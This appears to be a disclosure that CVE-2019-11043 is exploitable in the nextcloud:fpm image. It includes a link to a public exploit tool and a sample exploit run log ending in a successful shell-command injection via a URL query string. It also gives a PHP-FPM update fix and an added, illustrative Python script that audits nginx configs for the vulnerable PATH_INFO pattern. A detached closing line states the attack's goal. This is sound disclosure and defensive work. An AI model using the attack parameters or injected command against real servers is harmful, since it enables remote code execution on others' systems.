The CVE-2019-11043 vulnerability can be exploited in the latest nextcloud:fpm image.
This is due to the specific nginx configuration recommended for nextcloud:
https://github.com/nextcloud/docker#base-version---fpm
https://github.com/nextcloud/documentation/blob/master/admin_manual/installation/nginx.rst
https://github.com/nextcloud/docker/blob/master/.examples/docker-compose/with-nginx-proxy/mariadb/fpm/web/nginx.conf
Here’s the exploit: https://github.com/neex/phuip-fpizdam
Sample exploit run:
2019/10/22 19:36:29 Base status code is 200
2019/10/22 19:36:30 Status code 502 for qsl=1765, adding as a candidate
2019/10/22 19:36:31 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/22 19:36:48 Attack params found: --qsl 1760 --pisos 191 --skip-detect
2019/10/22 19:36:48 Trying to set "session.auto_start=0"...
2019/10/22 19:36:50 Detect() returned attack params: --qsl 1760 --pisos 191 --skip-detect <-- REMEMBER THIS
2019/10/22 19:36:50 Performing attack using php.ini settings...
2019/10/22 19:36:52 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/22 19:36:52 Trying to cleanup /tmp/a...
2019/10/22 19:36:52 Done!
To fix the issue, you need to update the PHP-FPM version in the nextcloud:fpm image.
Reference: https://bugs.php.net/bug.php?id=78599
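Because the report ties exposure to the nginx configuration in front of PHP-FPM, the following added example (not part of the original report or of the Nextcloud project) is a heuristic audit that flags location blocks which split PATH_INFO and pass it to FastCGI without a file-existence guard. It assumes the publicly documented precondition for this CVE (no try_files ... =404 or if (!-f ...) check in the PHP location); the function names and the sample configurations are constructed for illustration.

```python
import re

SPLIT = re.compile(r"\bfastcgi_split_path_info\s+\S+")
PATH_INFO = re.compile(r"\bfastcgi_param\s+PATH_INFO\b")
# File-existence guards: try_files ... =404, or if (!-f ...) / if (!-e ...)
GUARD = re.compile(r"\btry_files\s+[^;]*=404|\bif\s*\(\s*!\s*-[fe]\s")

def location_blocks(conf):
    """Yield (header, own_directives) per location block; nested block
    bodies are excluded so each location is judged on its own directives."""
    for m in re.finditer(r"\blocation\b([^{;]*)\{", conf):
        depth, i, own = 1, m.end(), []
        while i < len(conf) and depth:
            c = conf[i]
            depth += (c == "{") - (c == "}")
            if depth == 1 and c not in "{}":
                own.append(c)
            i += 1
        yield m.group(1).strip(), "".join(own)

def audit(conf):
    """Return headers of location blocks that split PATH_INFO and pass it
    to FastCGI without a file-existence guard. Heuristic: include files are
    not followed and inherited directives are not resolved."""
    conf = re.sub(r"#[^\n]*", "", conf)  # drop comments before matching
    return [h for h, body in location_blocks(conf)
            if SPLIT.search(body) and PATH_INFO.search(body)
            and not GUARD.search(body)]

# Constructed sample configs (not copied from the Nextcloud repository).
SAMPLE_UNGUARDED = r"""
server {
    location / { try_files $uri $uri/ /index.php$request_uri; }
    location ~ \.php(?:$|/) {
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_pass php-handler;
    }
}
"""
SAMPLE_GUARDED = SAMPLE_UNGUARDED.replace(
    "fastcgi_pass", "try_files $fastcgi_script_name =404;\n        fastcgi_pass")

if __name__ == "__main__":
    for name, conf in (("unguarded", SAMPLE_UNGUARDED), ("guarded", SAMPLE_GUARDED)):
        print(name, audit(conf) or "no unguarded PATH_INFO location found")
```

A clean result from this check does not replace the PHP-FPM update described above; it only identifies configurations that match the known precondition.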
Execute arbitrary PHP code on the target server